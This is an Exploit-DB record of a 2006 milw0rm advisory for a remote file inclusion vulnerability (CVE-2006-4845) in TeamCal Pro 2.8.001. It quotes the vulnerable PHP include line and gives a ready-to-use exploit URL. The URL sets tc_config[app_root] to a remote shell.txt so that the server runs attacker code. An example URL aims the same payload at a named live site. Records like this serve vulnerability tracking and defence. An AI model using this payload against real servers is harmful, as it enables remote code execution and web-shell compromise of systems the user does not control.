TeamCal Pro <= 2.8.001 app_root Remote file Include Vulnerability

2006-09-14T00:00:00
ID EDB-ID:2368
Type exploitdb
Reporter PSYCH@
Modified 2006-09-14T00:00:00

Description

TeamCal Pro <= 2.8.001 (app_root) Remote file Include Vulnerability. CVE-2006-4845. Webapps exploit for php platform

                                        
                                            #########################################################################
#Author:PSYCH@  psych0path@hackermail.com
#
#                                                            
#########################################################################
#TeamCal Pro 2.8.001 (app_root) Remote file inclusion Vulnerabilities
#Demo: www.lewe.com/tcpro/
#
#########################################################################
#Code:
#
#include( $tc_config['app_root']."includes/footer.html.inc.php" );
#
#########################################################################
#Exploit
#
#http://site.com/path/includes/footer.html.inc.php?tc_config[app_root]=shell.txt?
#
#Example:www.teamcounter.com/tcpro/includes/footer.html.inc.php?tc_config[app_root]=shell.txt?
#
#########################################################################
#Thnx:Warhack & mAfiAcarLEs & DarkXBoyZ
#
#
#########################################################################

# milw0rm.com [2006-09-14]